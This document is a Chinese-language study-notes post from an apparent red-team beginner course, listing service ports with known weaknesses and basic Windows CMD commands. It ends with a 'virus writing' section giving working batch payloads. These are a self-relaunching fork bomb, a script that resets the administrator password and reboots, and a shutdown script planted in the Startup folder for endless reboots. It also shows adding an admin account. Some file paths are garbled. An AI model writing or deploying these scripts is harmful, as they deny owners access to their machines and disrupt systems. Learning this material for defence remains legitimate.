红队知识学习入门(4)Windows病毒编写
声明
学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章笔记的只是方便各位师傅学习知识,以下网站涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负
1、端口号及对应漏洞
ftp:21
tenlnet:23
web:80
80-89:可能是web
443:ssl心脏滴血漏洞、web其他漏洞
445:smb
1433:mysql
1521:oracle
2082/2083:cpanel(主机管理系统登录(偏国外))
2222:da虚拟机主机管理系统登录(偏故国外)
3128:squid代理默认端口-漫游内网
3306:mysql
3312/3311:kangle主机管理系统登录
3389:远程桌面(前面文章有提到)
5432:postgreSQL
5900:vnc(前面文章有)
6379:redis(未授权)
7001.7002:weblogic 默认弱口令,反序列化
7778 kloxo:主机控制面板登录
8000-9090:一些常见的web端口,有些运维喜欢把管理后台开在非80端口上
8080:tomcat、wdcp主机管理系统,默认弱口令
8080,8089,9090:jboss
8083:vestacp主机管理系统(偏国外)
8649:ganglia
8888:宝塔 主机管理默认端口
10000:virtuamin/webmin 服务器虚拟主机管理系统
11211:memcache 未授权访问
27017,27018:mongodb未授权访问
28017:mongodb统计系统桌面
2、常用CMD基础命令
1、echo(输出)
echo ?/ (查看echo的帮助)
echo 123456 (输出123456)
echo 123456 > 666.txt(将123456重定向新建666.txt)
echo 123456 >> 666.txt(追加内容)
2、dir(列出当前目录所以文件)
3、d: c: cd(切换目录)
d:(切换到d盘)
c:(切换到c盘)
cd .(进入到当前目录)
cd ..(返回上一级目录)
cd/文件名(进入文件)
cd desktop(进入到界面)
4、tree(文件树状图)
tree /?(tree帮助)
tree /f(显示每个文件夹中的名称)
tree /a (用ascii字符输出)
tree C:\\User\Administrator /f
tree C:\\User\Administrator /a
5、创建目录、删除目录
md 666(创建666文件夹)
rd 666(删除666文件夹)
6、ipconfig /all(显示ip配置)
7、cls(清屏)
8、copy(复制拼接文件)
copy /? (查看帮助文档)
copy 1.txt ..\1.txt(把文件1.txt复制到上一级目录)
cd ..返回上一级目录
copy 1.txt+2.txt >3.txt(用echo输出两个文件,用copy将文件1和2拼接成3.txt
9、MOVE文件移动
move ..\1.txt 4.txt (将上一级目录1.txt移动到本级目录中,并且重命名为4.txt
10、ren(重命名)
ren 1.txt 2.txt
11、del(删除)
del 1.txt 2.txt (该删除是永久删除,回收箱找不到)
12、ping(探测主机ip是否存活)
ping \?(查看命令帮助文档)
ping -t www.baidu.com
13、type(显示文本内容)
echo hello>>1.txt
type 1.txt
14、reg(注册表)
reg \?
15、nslookup(探测域名信息)
nslookup www.baidu.com
nslookup -d www.baidu.com(查看历史解析记录)
16、find查找
find /?
echo 123456 >>1.txt
find "a" 1.txt
type 1.txt | find "a"(查看1.txt的内容并且输出带有a参数的字段)
type 1.txt | find "a" /n (增添一个排序)
17、tasklist(显示当前进程的信息)
18、taskkill(结束进程)
taskkill \?(查看帮助文档)
taskkill /pid +进程号
/f 强制kill命令
19、ver.winver(显示版本)
20、start cmd
start calc(打开计算器)
start ping www.baidu.com -t (启动ping 并执行-t)
21、systeminfo(查看整个系统信息)
22、logoff(注销)
logoff \?(查看帮助文档)
远程登录3389桌面时,当该机器处于链接状态,可以使用该命令注销对方远程登录
23、shutdown
shutdown /s 一分钟内关机
shutdown /a 计划取消
shutdown /r (重启)
shutdown /g 一分钟之内关机
shutdown /r /t 0(-t设置时间,设置为0立即执行)
shutdown /n 重启电脑
24、telnet(协议工具)
25、arp
arp -a(显示内网有哪些主机,方便于横向移动,用于发现同一网络主机)
26、at 定时任务
at time "shutdown /r /t 0" 定时关机
at 1 /delete 取消命令
27、net (服务)
net stop telnet (关闭telnet)
net start telnet(开启telnet)
net user(查看当前用户)
net user admin 123 /add (添加用户名admin,密码为123)
net user admin(查看admin的权限)
net user administrator (查看管理员用户权限)
提权Windows
net localgroup administrator admin /add(提权)
net user admin(查看admin用户权限)
实战编写病毒
资源耗尽病毒
echo start cmd > 1.txt
echo %0 >> 1.txt
ren 1.txt 1.bat
利用echo将启动cmd窗口命令写入到1.txt文件中,接着%0表示用于无限循环执行当前批处理文件,然后将1.txt文件改成1.bat脚本文件,执行后就会无限循环执行启动cmd窗口
锁机病毒
echo net user administrator 123456 > c:\windows\Temp\1.bat
echo shutdown /r /t 0 >> c:\windows\Temp\1.bat
无限重启病毒原理
echo shutdown /n /t0>c:\windows\Templ1.bat
将关机命令写入到1.bat文件
copyc:\windows\Templ1.bat %USERPROFILE%\AppDataRoaminglMicrosoft\windows\Start\MenulProgramsStartupl'
将写好的命令脚本到开机自启动目录,当电脑开机时就启动这个脚本,运行关机命令